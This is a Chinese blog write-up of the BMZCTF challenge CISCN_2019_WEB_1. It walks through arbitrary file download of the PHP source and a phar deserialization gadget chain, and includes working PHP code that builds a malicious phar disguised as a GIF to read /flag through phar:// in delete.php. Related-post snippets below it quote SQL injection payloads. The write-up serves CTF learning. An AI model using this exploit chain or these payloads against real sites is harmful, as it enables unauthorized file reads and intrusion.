[BMZCTF]-CISCN_2019_WEB_1

最新推荐文章于 2021-10-24 23:56:30 发布
最新推荐文章于 2021-10-24 23:56:30 发布
阅读量216 收藏
点赞数
分类专栏: BMZCTF php 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cjdgg/article/details/117255593
版权
php 同时被 2 个专栏收录
19 篇文章 1 订阅
订阅专栏
BMZCTF
13 篇文章 0 订阅
订阅专栏

[BMZCTF]-CISCN_2019_WEB_1
這道題目先注册一个用户登录进来吧
在这里插入图片描述
登陆后只有一个文件上传功能,而且限制了只能上传png,jpg,gif文件,其他的一律不允许,文件上传的一些绕过经过初步尝试是无效的,而且上传之后文件的存储路径不知道

在这里插入图片描述
这里可以注意道,他这里还提供了个文件下载的功能,那就说不定可以下载任意文件,这里直接抓下载的包然后尝试一下下载,成功拿到源代码
在这里插入图片描述
最终一共找到这么几个页面的源代码
在这里插入图片描述
看到了好几个魔法方法,果断全局搜索serialize
在这里插入图片描述
有点可惜
但还有phar,phar受影响的函数较多
在这里插入图片描述
最终是发现了file_exists
在这里插入图片描述
直接跟过去发现它是在file类的open方法中被调用了
在这里插入图片描述
然后再跟过去发现delete方法和download方法都调用了,那触发点算是找到了,但需要注意的是在download.php中,设置了目录:
在这里插入图片描述
而只有delete.php中的目录是在题目给定的文件上传沙盒中的,故只有delete操作能直接phar://触发反序列化。
在这里插入图片描述
接下来构造反序列化利用链,先找可利用函数,file类中的close方法调用了file_get_contents
在这里插入图片描述
这里要注意的是close()是File类的方法,而File类只在Filelist类中有调用过。但Filelist中并没有调用close()方法的位置。此时需要注意Filelist类中的两个魔术方法之一:__call
在这里插入图片描述
它将Filelist类中的files数组全部遍历了一遍,并执行对应的func()结果被存进result。之后的__destruct()方法则会将result等等结果打印出来。
这一条利用在于:确保了Filelist的对象如果能借此魔术方法调用close()方法,那么它最后销毁时析构函数会打印出我们需要的文件内容。

之后再次审计,注意到User类的__destruct()方法

在这里插入图片描述

原本只是一个同名close()函数,但是此处却存在着可利用之处。假如我们的文件上传的是User类的对象。销毁时自然会执行close()函数。但如果把db设置为Filelist类的对象,那么db->close()执行时将找不到close()函数,进而执行其files数组里的每一个函数。那么如果files数组里是存在同名函数close的File类对象,就能成功执行文件读取。

<?php 
class User{
	public $db;
}
class File{
	public $filename = "/flag";
}
class FileList {
    private $files;
    private $results;
    private $funcs;
    public function __construct(){
    	$this->files = array(new File());
    	$this->results = array();
    	$this->funcs = array();
    }
}
$a = new User();
$a->db = (new FileList());
echo serialize($a);

$phar = new Phar("exp.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($a);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
?>

将生成的exp.phar改成exp.gif上传,然后在delete页面改成filename=phar://exp.gif
在这里插入图片描述
参考文章:https://www.jianshu.com/p/ca36dfed3fdb

lmonstergg
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BMZCTF内存取证三项.zip
10-21
BMZCTF内存取证三项.zip》是一个与网络安全和取证相关的压缩文件,包含了一次可能的CTF(Capture The Flag)挑战。从标题和描述中,我们可以推测这是一场涉及解密、密码学以及文件分析的竞赛。接下来,我们将深入...
BMZCTF-Web WriteUp
Crazy198410的博客
11-15 1368
Web 题 hctf_2018_warmup 打开后是一张图片。 查看源码发现source.php 访问,得到一串代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.
CISCN_2019_WEB_1
qq_53460654的博客
10-24 3325
打开环境是个网盘管理系统 本来想试试照这个管理系统源码的没找到 注册个号进去上传个图片 发现只有下载和删除两个选项 我们来抓包看看下载会不会任意文件下载 发现可以 那就直接这样读源码 index.php <?php include "class.php"; $a = new FileList($_SESSION['sandbox']); $a->Name(); $a->Size(); ?> class.php <?php error_reporting(0); $dba
BUUCTF [CISCN2019 华北赛区 Day1 Web1]Dropbox 1
weixin_45642610的博客
07-08 1218
进入页面随便注册一个账号,登录。 随便上传一个图片。 用burpsuite拦截下载页面,里面有任意文件下载文件,可以下载源码。 用../../index.php格式把index.php,download.php, delete.php下载,打开发现用到class.php,也下了。 #index.php <?php session_start(); if (!isset($_SESSION['login'])) { header("Location: login.php"); die
[BMZCTF]-phar??
cjdgg的博客
05-24 729
[BMZCTF]-phar?? 进入题目后,根据源代码中的提示,可以发现两个页面 在include.php中根据页面中的提示,应该是存在文件包含的,这里随便包含了一个文件试试,根据报错不难看出确实是存在文件包含漏洞 ...
BMZCTFCISCN_2019_WEB_1
末初的CSDN博客
02-07 692
http://bmzclub.cn/challenges#CISCN_2019_WEB_1 先熟悉下业务功能,注册登录之后,有个上传文件的地方,然后可以下载或者删除上传的文件 题目这里没有提供源码,自己网上找一下2019CISCN华北赛区Day1的web题 源码地址:CISCN-2019-Northern-China-Web 文件上传这里并没有看到可以绕过白名单上传shell的方法 审计源码,发现一个file_get_contents() //class.php class File { p
ctf逆向解题——re1-附件资源
03-02
ctf逆向解题——re1-附件资源
2020祥云杯 CTFNu1L.pdf
03-15
1. RAR伪加密:这是一种常见的加密方法,它通过修改文件头的方式来欺骗解压缩软件,使其认为文件已经被加密。实际上文件并没有加密,只是通过改变文件头信息,让一些没有做足够检查的解压软件无法正常打开。要解压伪...
androidpn 消息推送 服务器端源码
08-10
4. **Web管理界面**:描述中提到,AndroidPN包含一个Web管理页面,这使得开发者可以直观地监控推送状态,管理设备信息,以及发送测试消息。这部分源码涉及到前端技术,如HTML、CSS和JavaScript,以及后端与前端交互...
BMZCTF CISCN_2019_WEB_1
qq_26243045的博客
11-26 336
首先注册一个用户并登录,发现可以上传和下载文件但是后缀只允许上传图片格式,通过对下载文件进行测试发现存在任意文件下载漏洞。 download.php <?php session_start(); if (!isset($_SESSION['login'])) { header("Location: login.php"); die(); } if (!isset($_POST['filename'])) { die(); } include "class.php"
BMZCTF rcee
qq_26243045的博客
11-29 385
考点:代码审计、Shell命令 打开网页,可以看到源码 存在命令执行,但要求长度小于8。 首先寻找flag。先在根目录下寻找:输入`?command=ls /` 可以看到flag就在根目录下。 进行访问: 没有回显。因为空格被处理成`%20`,当成3个字符,要执行的命令长度超过8了。 使用`*`代替,输入:`?command=cat /f*` 可以看到,把f开关的所有文件内容都显示了出来。也可以看到flag ...
CISCN-WEB-ikun
迷风小白
09-17 3497
知识点 薅羊毛与逻辑漏洞 cookie伪造 python反序列化 IKUN 1.拿到题目,先注册一个账号登录 2.登录进去发现存在账户余额,且根据题目提示需要购买lv6 3.这里的商品目录很多,一页一页找太麻烦了,所以可以写个脚本搜一下 import requests url = "http://acb60e5d-e45c-417d-92b0-0175588a97ab.node1.bu...
[CISCN2019 总决赛 Day2 Web1]Easyweb 1
weixin_43940853的博客
03-17 1360
文件泄露 通过观察源代码(反正就是这几个php文件嘛,一个个试就行了) //image.php.bak <?php include "config.php"; $id=isset($_GET["id"])?$_GET["id"]:"1"; $path=isset($_GET["path"])?$_GET["path"]:""; $id=addslashes($id); $path=a...
【WP】CISCN2021初赛-WEB部分
車鈊的博客
06-06 792
WEB Easysql 模糊测试 发现columns,information,union(大小写)被过滤 报错回显点 UNION联合注入无法使用,测试登录发现报错点 回显位和库名 我们采用报错注入,用and做语法连接 // 测试列数 wyx123')and(select 1)# // 爆破库名 wyx123')and(select updatexml(1,concat(0x7e,database(),0x7e),1))# 列名的猜解-无列名注入 当我们构造连接查询,对其加上using限制(using:
ciscn2019 华东南赛区线下赛WEB第一题
CODER的博客
06-27 1262
题目过滤了union 和大量的sql函数,本意是想让人读文件,当时心太急了没做出来,现在复习一下,脚本很简单,利用的是ascii的字符串比较 如 select load_file('/flag')>='A' select load_file('/flag')>='AB' select load_file('/flag')>='ABC' select load_file('/fla...
2021全国大学生信息安全大赛[CISCN]web部分复现
1ance's blog
05-18 1471
目录Webeasysqleasy_source Web easysql 太菜了。。一道注入搞了半天也没整出来离谱的很。。 先是想着sqlmap跑一下,结果发现是sqllabs的数据库,发现flag表,心中暗想不会吧不会吧这就出来了??接下去,才发现是我太年轻了。flag表里啥就一个id字段,其他的啥也没跑出来,离谱啊。。 只能手工测测了。发现有报错注入,但是information被过滤了,查不了列名,然后想着用时间盲注,跑出列名,最后跑出来flag(那一刻是超爽)。。。。但是提交错误(心态炸裂),然后开始检
[CISCN2019 总决赛 Day2 Web1]Easyweb
沐目的博客
12-08 2596
1. 知识点 备份文件泄露 SQL注入利用 php短标签 2.感悟 这到题,我就写到SQL注入的地方,成功绕过了单引号的限制用\0,但是没有往盲注上想。以为是任意文件下载。看完题解,知道了思路应该是bool盲注,语句成功的话,就让id = 1,回显正常,错误的话 id = 0,就什么都没有。 这是我没有想到的,气死我了,应该是可以想到了。 3.实践 3.1 image.php.bak 御剑扫描...
[CISCN2019 华北赛区 Day1 Web1]Dropbox
沐目的博客
10-31 6820
知识点轰炸 1.1 open_basedir 在in_set这个函数中,可以设置php的一些配置,其中就包括open_basedir ,用来限制当前程序可以访问的目录。后来问了一下朱师傅,了解到:它是可以访问设置目录下的所有下级目录。 若"open_basedir = /dir/user", 那么目录 “/dir/user” 和 “/dir/other"都是可以访问的。所以如果要将访问限制在仅为指...
BMZCTF:upload-double
末初的CSDN博客
04-30 487
http://www.bmzclub.cn/challenges#upload-double /inc.php?inc=upload.php疑似存在文件包含,文件上传后缀被控制的无法绕过,上传图片马然后,尝试包含图片马 成功包含了,但是好像执行并没有效果 下载上传到服务器上的图片,发现木马的内容不见了,判断这里应该是对上传的图片进行了二次渲染,木马内容被渲染后去除了 要使图片马有效,就得将木马内容写在不会被二次渲染的区域,搜索引擎找到个脚本可以将木马内容放在不会被渲染的区域,并且能够成功上传 &
[CISCN2019 华北赛区 Day2 Web1]Hack World
沐目的博客
10-21 9082
1.测试过滤 我想到到了: 联合注入:unin被过滤 报错注入:and、or、updatexml被过滤 bool注入和time注入:and、or被过滤 可以通过fuzz测试(模糊测试),发现哪些字符被过滤了。length为482的,全都是被过滤的。 然后就在网上学了一些技巧: 利用/*!union*/可以绕过对union的过滤,虽然这题不能用,但是记一下吧。 2.异或 这东西和那个堆叠注入一样...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值